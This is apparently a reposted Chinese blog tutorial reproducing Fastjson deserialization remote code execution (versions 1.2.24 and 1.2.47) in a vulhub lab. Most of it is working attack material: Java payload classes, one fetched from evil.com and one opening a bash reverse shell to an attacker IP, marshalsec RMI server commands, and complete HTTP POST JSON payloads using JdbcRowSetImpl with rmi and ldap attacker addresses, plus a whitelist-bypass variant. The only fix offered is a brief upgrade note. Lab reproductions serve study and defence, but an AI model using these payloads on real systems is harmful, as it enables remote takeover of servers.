来自云龙湖轮廓分明的月亮 发表于 2024-7-24 08:30:23

Java安全篇-Fastjson毛病

媒介知识:

一、json

概念:

json全称是JavaScript object notation。即JavaScript对象标志法,利用键值对举行信息的存储。
格式:

{

        "name":"wenda",

        "age":21,

}  作用:

JSON 可以作为一个对象大概字符串存在,前者用于解读 JSON 中的数据,后者用于通过网络传输 JSON 数据。这不是一个大事件——JavaScript 提供一个全局的 可访问的 JSON 对象来对这两种数据举行转换。
二、Fastjson毛病

原理:

Fastjson是一个由阿里巴巴开源的Java库,用于将 Java 对象转换成其 JSON 表示形式,也可以用来将 JSON 字符串转换成等效的 Java 对象,与原生的java反序列化相比,FastJson未利用readObject()方法举行反序列化,而是利用了自界说的一套方法,引进了AutoType功能,在反序列化的过程中,会读取到@type的内容,还调用getter和setter方法将JSON字符串还原成对象。,然而,@type的类有可能被恶意构造,只需要公道构造一个JSON,利用@type指定一个想要的攻击类库就可以实现攻击。
为何引进 AutoType功能:

即在序列化的时候,先把原始类型记录下来。利用@type的键记录原始类型,
指纹特性:

恣意抓个包,提交方式改为POST,花括号不闭合。返回包在就会出现fastjson字样
危害:

远程代码执行
影响版本:

影响版本:Fastjson1.2.24及之前版本。
代码审计:

参考
fastjson反序列化原理分析 - FreeBuf网络安全行业流派
复现:

Java安全篇--Fastjson1.2.24-RCE毛病

1.RMI攻击

RMI 全称 Remote Method Invocation,是 JAVA 实现远程过程调用的应用步伐编程接口,存储于 java.rmi 包中,利用期方法调用对象时,必须实现 Remote远程接口。它可以让客户机上运行的步伐调用远程服务器上的对象。而远程方法调用的特性可以让开发者可以或许在网络情况中分布操作。RMI 宗旨就是尽可能简化远程接口对象的利用。
REDEME.md
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

参考资料:

- https://www.freebuf.com/vuls/208339.html
- http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/

## 漏洞环境

运行测试环境:

```
docker compose up -d
```

环境运行后,访问`http://your-ip:8090`即可看到JSON格式的输出。

我们向这个地址POST一个JSON对象,即可更新服务端的信息:

```
curl http://your-ip:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'
```

## 漏洞复现

因为目标环境是Java 8u102,没有`com.sun.jndi.rmi.object.trustURLCodebase`的限制,我们可以使用`com.sun.rowset.JdbcRowSetImpl`的利用链,借助JNDI注入来执行命令。

首先编译并上传命令执行代码,如`http://evil.com/TouchFile.class`:

```java
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
      try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
      } catch (Exception e) {
            // do nothing
      }
    }
}
```

然后我们借助(https://github.com/mbechler/marshalsec)项目,启动一个RMI服务器,监听9999端口,并制定加载远程类`TouchFile.class`:

```shell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
```

向靶场服务器发送Payload,带上RMI的地址:

```
POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
      "@type":"com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName":"rmi://evil.com:9999/TouchFile",
      "autoCommit":true
    }
}
```

可见,命令`touch /tmp/success`已成功执行:
打开情况 抓包得到
https://img-blog.csdnimg.cn/direct/64add626e7c84b93a20576bf5b47a5f2.png 修改为POST传参 再修改type 和传入json数据 发现name变了
https://img-blog.csdnimg.cn/direct/fa595162e00f4fadb1c41b60fd91bdf0.png
说明咱们就可以POST传参了  为后面传paylaod做准备
 在vulhub下的fastjson 1.2.24文件夹下保存以下代码为TouchFile.java文件
注意 这里的IP为你的攻击机IP
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
      try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.85.136/2333 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
      } catch (Exception e) {
            // do nothing
      }
    }
}
编译为.class文件  jdk情况为1.8 高情况实现不了远程调用
javac TouchFile.java 把编译好的class文件传到kali(攻击机)中 ,可以选择scp下令复制
在class文件所在的目录,Python起一个http服务。用80端口启动http服务的下令为:
python3 -m http.server 80 https://img-blog.csdnimg.cn/direct/1caf80878db24f699e821696c937ef51.png
利用marshalsec工具(需要maven情况编译)启动RMI服务
 marshalsec工具下载地址
git clone https://github.com/mbechler/marshalsec 安装maven
apt-get update
apt-get install maven 进入marshalsec目录,执行如下下令举行编译。
mvn clean package -DskipTests https://img-blog.csdnimg.cn/direct/ec4a60ed45a64b50aa28c230c0958d82.png
 启动RMI服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.85.136:80/#TouchFile" 9999 然后重新访问靶场 抓包修改为Content-Type为application/json,发送payload
POST / HTTP/1.1

Host: 192.168.85.129:8090

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/json

Content-Length: 170



{

    "b":{



      "@type":"com.sun.rowset.JdbcRowSetImpl",



      "dataSourceName":"rmi://192.168.85.136:9999/TouchFile",



      "autoCommit":true

}



 httpserver收到请求,RMI服务器收到请求,复现乐成
https://img-blog.csdnimg.cn/direct/c3a7148af2f64f509ceac14b303790ba.png
此时应该已经完成了毛病复现,我们检测一下是否在tmp目录touch创建了文件successFrank即可。运行docker ps查看容器id 进入容器,执行
docker exec -it 容器id /bin/bash 2.反弹shell攻击 

Fastjson反序列化毛病原理与毛病复现(CVE-2017-18349)_fastjson反序列化毛病cve-CSDN博客
3.修复方案:

 将Fastjson升级至最新版本
Fastjson反序列化毛病原理与毛病复现(基于vulhub,保姆级的详细教程)_fastjson毛病原理-CSDN博客
Java安全篇--Fastjson1.2.47-RCE毛病4

概念:

fastjson 于1.2.24 版本后增长了反序列化白名单。而在2019年6月,fastjson 又被爆出在fastjson< =1.2.47的版本中,攻击者可以利用特别构造的 json 字符串绕过白名单检测,乐成执行恣意下令
 其实这个毛病利用跟1.2.24差不多,就是最后上传的payload举行更改
{ "name":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "x":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://ip:9999/Exploit", "autoCommit":true } } 一文读懂面试官都在问的Fastjson毛病 - FreeBuf网络安全行业流派
fastjson 1.2.47 RCE毛病保姆级复现 - FreeBuf网络安全行业流派
修复方案:

升级至最新版本即可

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: Java安全篇-Fastjson毛病